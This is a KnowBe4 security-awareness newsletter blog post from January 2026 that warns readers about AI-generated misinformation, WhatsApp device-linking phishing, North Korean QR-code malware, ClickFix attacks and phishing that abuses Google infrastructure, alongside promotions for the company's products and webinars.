Skip to content
Search
  • There are no suggestions because the search field is empty.
Cancel
Get Started Now

    Security Awareness Training Blog

    CyberheistNews Vol 16 #02 When You Can't Believe Your Eyes: AI and the New Misinformation Playbook

    KnowBe4 Team | Jan 13, 2026
    Cyberheist News
    CyberheistNews Vol 16 #02  |   January 13th, 2026

    When You Can't Believe Your Eyes: AI and the New Misinformation Playbook

    In the early hours following reports of a U.S. military operation involving Venezuela, social media feeds were flooded with dramatic images and videos that appeared to show the capture of Venezuelan president Nicolás Maduro.

    Within minutes, AI-generated photos of Maduro being escorted by U.S. law enforcement, scenes of missiles striking Caracas and crowds celebrating in the streets racked up millions of views across various social media channels.

    The problem? Much of this content was fabricated or misleading.

    Fake images circulated alongside real footage of aircraft and explosions, creating a convincing—but deeply confusing—mix of truth and fiction. The lack of verified, real-time information created a vacuum, and advanced AI tools rushed in to fill it.

    According to fact-checking organizations, several widely shared images were generated or altered using AI, despite appearing realistic enough to fool casual viewers—and even public officials.

    This is exactly how modern social engineering works.

    Attackers don't rely on obviously fake signals anymore. Just as phishing emails now mimic trusted brands and real conversations, AI-generated images increasingly "approximate reality." They don't need to be wildly inaccurate to be effective, just believable enough to bypass skepticism and trigger an emotional response.

    Even experienced users struggled to determine what was real. Reverse image searches, AI-detection tools and watermarking technologies like Google's SynthID can help identify manipulated content, but they're far from foolproof. When fake visuals closely resemble real events, detection becomes inconsistent and misinformation spreads faster than fact-checkers can respond.

    That uncertainty is the point.

    In cybersecurity, we warn employees that urgency, authority and incomplete data are classic manipulation tactics. The same techniques were on full display here. Breaking news, high emotional stakes and a flood of convincing visuals pushed people to share first and verify later—if at all.

    The takeaway for organizations and individuals is clear: visual content can no longer be trusted at face value, especially during fast-moving events. Training people to pause, question sources and look for verification is just as important for news consumption as it is for email security.

    Because whether it's a phishing email or an AI-generated image, the goal is the same: get you to believe something before you have time to think. And in today's threat landscape, believing is often the first step toward being misled.

    Blog post with links:
    https://blog.knowbe4.com/when-seeing-isnt-believing-ai-images-breaking-news-and-the-new-misinformation-playbook

    Deepfake: Empowering Your Users to Recognize What AI Can Fake

    Your users are being targeted right now. Deepfake attacks happen every few minutes, and nearly half of all organizations have already been hit. When a deepfake lands in your user's inbox, will they spot it or fall for it?

    In this session, Perry Carpenter, Chief Human Risk Management Strategist, and Chris Littlefield, Product Manager, pull back the curtain on the next era of social engineering. Deepfakes, AI agents and synthetic narratives are reshaping the threat landscape and traditional training no longer prepares users for attacks that feel real.

    You'll learn how to build a workforce that stays calm, curious and grounded in truth, even when a scam sounds exactly like someone they trust.

    You'll explore:

    • How attackers use plausibility, framing and myth-direction to make AI-generated impersonations feel instantly legitimate
    • Recent deepfake and voice-clone incidents that expose where human judgment faltered—and how better cognitive defenses would have changed the outcome
    • Training methods that build narrative awareness and emotional self-regulation, preventing both overreaction and paralysis
    • Practical verifications your employees can practice to recognize a fake even when an email sounds right, a voice sounds familiar or a video "looks close enough"
    • NEW! KnowBe4's Deepfake Training Content shows how to create a custom deepfake training experience featuring your own leaders to transform abstract risk into unforgettable learning moments

    You'll leave the webinar with the strategy and tools to help employees recognize and validate AI-driven manipulation, plus measurable ways to demonstrate to leadership how you can reduce real-world deepfake risks.

    Date/Time: TOMORROW, Wednesday, January 14 @ 2:00 PM (ET)

    Can't attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

    Save My Spot:
    https://info.knowbe4.com/new-deepfake-training-na?partnerref=CHN2

    Phishing Campaign Targets WhatsApp Accounts

    Researchers at Gen warn that a phishing campaign is attempting to trick users into linking malicious devices to their WhatsApp accounts.

    The attack begins with an unsolicited message stating, "Hey, I just found your photo!" along with a link to a spoofed Facebook login page. Instead of trying to steal users' Facebook credentials, however, the attackers are attempting to gain access to victims' WhatsApp accounts.

    "This page has two purposes," the researchers explain. "First, it creates a sense of familiarity that encourages the user to trust the page. People expect Facebook to ask for some kind of confirmation from time to time. Seeing a login button or a verification step feels normal.

    "Second, it acts as the attacker's control panel. The page is not connecting with Facebook but rather mediating between the victim and the legitimate WhatsApp Web infrastructure that the attacker is abusing."

    The phishing page either shows a QR code or contains a field for the user to enter their phone number. The attack proceeds as follows:

    • The victim types their phone number on the fake page.
    • The page forwards that number to WhatsApp's legitimate "link device via phone number" feature.
    • WhatsApp generates a pairing code that is meant to be seen only by the account owner.
    • The attacker's site takes that code and displays it back to the victim with text that suggests they should 'enter this in WhatsApp to confirm the login and see the photo.'
    • The victim opens WhatsApp, sees the pairing prompt and enters the code, believing they are completing a security check.

    Once the malicious device is paired, the attacker has full access to the victim's WhatsApp account and can send additional phishing messages to the victim's contacts.

    Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

    Blog post with links:
    https://blog.knowbe4.com/phishing-campaign-targets-whatsapp-accounts

    Automate Incident Response and Maximize SOC Efficiency

    Your security team is drowning in alerts, and threats are slipping through. With SOC teams facing more than 4,400 daily alerts, over 40% of which are false positives, the vast majority of organizations are drowning in backlogs.

    The result? A five-hour response gap that leaves threats sitting in your employee inboxes for days or weeks. Stop gambling with unaddressed alerts with technology that collapses the time-to-containment from hours to minutes.

    During this demo, you'll discover how PhishER Plus eliminates the dangerous vulnerability window between threat detection and containment by combining triple-validated threat intelligence with human oversight:

    • Accelerate Response times with AI-powered automation that allows you to code custom rules in plain-English, reduce manual email review time by up to 99%, and eliminates alert fatigue
    • Leverage unmatched threat intelligence from 13+ million global users, KnowBe4 Threat Research Lab, and leading third-party integrations, catching zero-day threats that bypass SEGs and other ICES defenses
    • Maintain complete visibility and control over AI-driven decisions with PhishML Insights, eliminating black-box uncertainty and reducing false positives that waste $875K annually
    • Remove threats automatically from all mailboxes with Global PhishRIP before users can interact with them, eliminating the risk of employees otherwise falling for the attack
    • Convert real attacks into targeted training opportunities with PhishFlip, reinforcing vigilant employee behavior while showcasing security awareness gaps

    Discover how PhishER Plus customers achieve 650% ROI within the first year. Transform your employees into your most valuable defenders while meeting SOC efficiency targets.

    Date/Time: Wednesday, January 21 @ 2:00 PM (ET)

    Save My Spot:
    https://info.knowbe4.com/phisher-demo-1?partnerref=CHN

    North Korean Threat Actor Spreads Malware via QR Codes

    The North Korean threat actor "Kimsuky" is using QR codes to trick users into installing malicious mobile apps, according to security researchers at ENKI.

    The phishing sites, which impersonate delivery services, inform users that the webpage cannot be viewed on a desktop. The sites instruct the user to scan a QR code in order to open the page on their phone. This helps the attack bypass security defenses that might be present on the user's work computer.

    "We confirmed that the malicious application was distributed from the IP address 27.102.137[.]181, leveraging a QR code that impersonated a legitimate package delivery service," the researchers explain.

    "Among the four malicious applications discovered during the investigation, two masqueraded as delivery service apps. A previous report by ESTSecurity documented similar cases where the threat actor transmitted URLs hosting malicious apps via smishing texts that impersonated delivery companies. Consequently, we assess with high confidence that the threat actor employed smishing or phishing emails for initial access, consistent with historical TTPs."

    When the user scans the QR code, they'll be taken to a phishing page that uses social engineering to trick them into installing malware or entering sensitive information.

    "While clicking the link does not automatically execute the malicious app, the threat actor designs sophisticated phishing sites to trick victims into running the malware or entering personal information," ENKI says.

    "To prevent infection, users should avoid clicking links from unknown senders. For links received from known contacts, if the content appears unusual or suspicious, users should verify the message with the sender before clicking."

    AI-powered security awareness training gives your organization an essential layer of defense against social engineering attacks.

    Blog post with links:
    https://blog.knowbe4.com/north-korean-threat-actor-spreads-malware-via-qr-codes

    [Live Demo] Stop Inbound and Outbound Email Threats

    With over 376 billion emails sent daily, your organization faces unprecedented risks from Business Email Compromise (BEC), misdirected sensitive communications and sophisticated AI-driven phishing attacks. The human element, involved in the vast majority of data breaches, contributes to email-based threats that cost organizations like yours millions annually.

    Discover how you can stop up to 97% more attacks and uncover 10x more potential data breaches in your Microsoft 365 environment before they happen.

    Join our live demo to see how KnowBe4's Cloud Email Security seamlessly integrates into Microsoft 365 to enhance its native protection while providing the tools needed to identify risky communications before they lead to breaches.

    See KnowBe4's Cloud Email Security in action as we show you how to:

    • Defend your organization against sophisticated inbound threats including BEC, supply chain attacks and ransomware
    • Prevent costly outbound mistakes with real-time alerts that stop misdirected emails and unauthorized file sharing
    • Enforce information barriers that keep you compliant with industry regulations
    • Detect and block data exfiltration attempts before sensitive information leaves your organization
    • Customize incident response workflows to match your security team's needs

    Strengthen your security posture with AI-native intelligent email security that reduces human-activated risk and safeguards your organization from inbound and outbound threats.

    Date/Time: Wednesday, January 21 @ 1:00 PM (ET)

    Save My Spot:
    https://info.knowbe4.com/ces-demo-month-1?partnerref=CHN


    Let's stay safe out there.

    Warm regards,

    Stu Sjouwerman, SACP
    Executive Chairman
    KnowBe4, Inc.

    PS: HR professionals don’t expect bad actors to "apply" for a position. This makes them susceptible to real security threats. Here is free training for your HR Team:
    https://www.knowbe4.com/free-cybersecurity-tools/secure-hiring-and-onboarding

    PPS: Your KnowBe4 Fresh Content Updates from December 2025:
    https://blog.knowbe4.com/fresh-content-updates-from-december-2025

    Quotes of the Week  

    "Very little is needed to make a happy life; it is all within yourself, in your way of thinking."
    - Marcus Aurelius - Roman Emperor (121 -180 AD)

    "One’s mind, once stretched by a new idea, never regains its original dimensions."
    - Oliver Wendell Holmes - Physician, Poet, and Polymath (1809 - 1894)

    Thanks for reading CyberheistNews

    You can read CyberheistNews online at our Blog
    https://blog.knowbe4.com/cyberheistnews-vol-16-02-when-you-cant-believe-your-eyes-ai-and-the-new-misinformation-playbook

    Security News

    ConsentFix Attacks Fake Cloudflare Prompts

    By Roger Grimes

    ClickFix attacks have been around for decades; only the name is new. ClickFix attacks use social engineering to trick users into clicking on buttons and links that the user is told are needed so their browser or computer can perform some desired action.

    ClickFix Attacks

    The most common original type of ClickFix attack example, and where the name itself comes from, is where a user intentionally searches for some sort of computer error they are having, say Windows error 1F0039a (I made that up), and the browser engine returns a lot of links regarding that error.

    Unbeknownst to the user, the internet search engine results have been gamed (i.e., "poisoned") so that a simple search for a solution returns a malicious website high up in the results. Usually, the attacker has either created a fake website with the error message embedded into the website over and over (but not visible to users), or they have paid the search engine vendor to have their website returned when that particular keyword is searched on. Either way, the attacker's website link ends up high on the list of websites with solutions.

    When the user goes to the malicious website, the scammer attempts to social engineer the user into performing an action that is against the user's best interests. In most cases, it is to click a button to fix something (hence, the "ClickFix" name).

    Sometimes the button click takes the user to another malicious website, sometimes it downloads a malicious document or content, and sometimes it brings up instructions that the user is supposed to copy and run on their computer.

    These days, if you hear of the ClickFix attack, it is usually the type of attack where the victim gets tricked into copying/pasting attack code into their own desktop environment, unwittingly executing malware on their computer. It bypasses firewalls, antivirus scanners and content filters.

    [CONTINUED] at the KnowBe4 Blog:
    https://blog.knowbe4.com/consentfix-attacks-fake-cloudflare-prompts

    Phishing Campaign Abuses Google’s Infrastructure to Bypass Defenses

    Researchers at RavenMail warn that a major phishing campaign targeted more than 3,000 organizations last month, primarily in the manufacturing industry. The phishing messages posed as legitimate business notifications, such as file access requests or voicemail alerts, and were designed to send users to credential-harvesting login pages.

    Notably, the campaign abused legitimate Google infrastructure and links to avoid being flagged by security tools.

    "In each case, emails were sent from legitimate Google infrastructure, passed SPF, DKIM and DMARC, and used trusted Google-hosted URLs as payloads," RavenMail says. "This fundamentally breaks the trust model that most email security platforms rely on.

    "Security researchers have repeatedly observed that these campaigns bypass both secure email gateways and native email protections because there is nothing technically 'wrong' with the message delivery itself."

    The campaign didn't involve any breach of Google's systems, but the attackers were able to "manipulate workflow automation services meant to streamline business processes." The researchers note that this is part of a broader trend in which attackers are abusing legitimate services to bypass defenses.

    "Attackers are also hosting phishing pages and multi-stage redirectors on Google Cloud Storage (GCS) - a fully trusted, HTTPS-served domain space," RavenMail says. "Because many URL reputation systems treat cloud provider domains as benign, these links frequently evade detection.

    "Separately, other campaigns have exploited Google platforms like Google Classroom and Google Forms to distribute phishing content at massive scale and avoid security filters that block unknown or low-reputation domains."

    AI-powered security awareness training gives your organization an essential layer of defense against evolving social engineering attacks.

    RavenMail has the story:
    https://ravenmail.io/blog/phishing-using-google-infra

    What KnowBe4 Customers Say

    "Thank you for reaching out! I hope you had a good holiday and I’m glad to have this opportunity to give a shout out to our CSM, Kim A. She has genuinely provided the best customer support I’ve ever experienced, in a corporate or private setting. We had a few unusual requirements and experienced some unexpected issues with our own internal systems, and she’s been incredibly responsive and helpful throughout. I can’t say enough good things about how well our onboarding journey has gone so far. Thanks again!"

    - A.D., Global Manager, Security Awareness

    "I just wanted to drop you a quick note and let you know how AWESOME Tom is. He is showing us things in the platform we never knew existed. He is helping us tweak our campaigns, teaching us to use some of the newer features and just been an all-around pleasure to work with.

    "We look forward to our monthly calls and are constantly thinking of ways (or Tom is helping shape some of those thought processes) to improve the platform and overall security awareness here.

    "We are a super small team with a giant workload. Having a CSM that can point us in the proper direction and help get things configured, has been an awesome change for our team. While we would love to spend time and become experts in all our platforms, it is not feasible. Having a trusted resource like Tom, looking at our account settings, making recommendations, and showing us how to configure those recommendations, has been a game changer for us.

    "Please give that dude a raise!!!!!!!

    "Side Note: We may cry if we ever lose him from our account now! That is how much we love Tom. You should be proud to have someone as thorough, caring, and easy to work with, on your team. I know I would be!

    "Thanks for your time and for letting Tom change our perception of KB4. It has been an awesome ride these last couple months! Best wishes on a fantastic rest of your day!"

    - B.J., AVP of Infrastructure and IT Security

    The 10 Interesting News Items This Week
    1. BREAKING NEWS: 'Instagram 17.5M security breach'. Data is already being offered on the dark web. Malwarebytes provide a free scan to see if an email is compromised:
      https://www.malwarebytes.com/digital-footprint?

    2. Maduro raid had telltale signs of a cyber-enabled blackout:
      https://www.axios.com/2026/01/08/venezuela-maduro-raid-blackout-cyber-operation

    3. What CISOs need from AI in a new year of cyberthreats:
      https://www.informationweek.com/cybersecurity/what-cisos-need-from-ai-in-a-new-year-of-cyberthreats

    4. A Fifth of Data Breaches Take Two Weeks(!) to Recover From:
      https://www.infosecurity-magazine.com/news/fifth-breaches-two-weeks-recover/

    5. Fake ChatGPT and DeepSeek Extensions Spied on Over 1 Million Chrome Users:
      https://hackread.com/fake-chatgpt-deepseek-extensions-spy-chrome-users/

    6. World Economic Forum: Deepfake Face-Swapping Tools Are Creating Critical Security Risks:
      https://www.infosecurity-magazine.com/news/wef-deepfake-faceswapping-security/

    7. Europol Leads Global Crackdown on Black Axe Cybercrime Gang, 34 Arrested:
      https://www.infosecurity-magazine.com/news/europol-crackdown-on-black-axe/

    8. FBI warns of phishing messages impersonating senior U.S. officials:
      https://www.ic3.gov/PSA/2025/PSA251219

    9. Phishing campaign uses HTML tables to render malicious QR codes:
      https://isc.sans.edu/diary/A+phishing+campaign+with+QR+codes+rendered+using+an+HTML+table/32606

    10. Attackers are increasingly using OAuth consent phishing to gain access to cloud environments:
      https://www.netskope.com/resources/cloud-and-threat-reports/cloud-and-threat-report-2026

    Cyberheist 'Fave' Links
    This Week's Links We Like, Tips, Hints and Fun Stuff

     

    Return To KnowBe4 Security Blog

    Topics: Cybercrime, KnowBe4

    KnowBe4 Team

    ABOUT KNOWBE4 TEAM

    The KnowBe4 Team delivers timely, expert-driven insights on cybersecurity trends, emerging threat intelligence, human risk best practices, compliance strategies and industry research to help organizations strengthen their human defense layer and stay informed, resilient, and secure.

    Read more from KnowBe4 »

    Subscribe to Our Blog


    Security Awareness Training
    Blog RSS Feed
    Gartner Magic Quadrant
    All Posts

    Posts by Tag

    See all

    Posts By Topic

    View All

    Get the latest insights, trends and security news. Subscribe to CyberheistNews.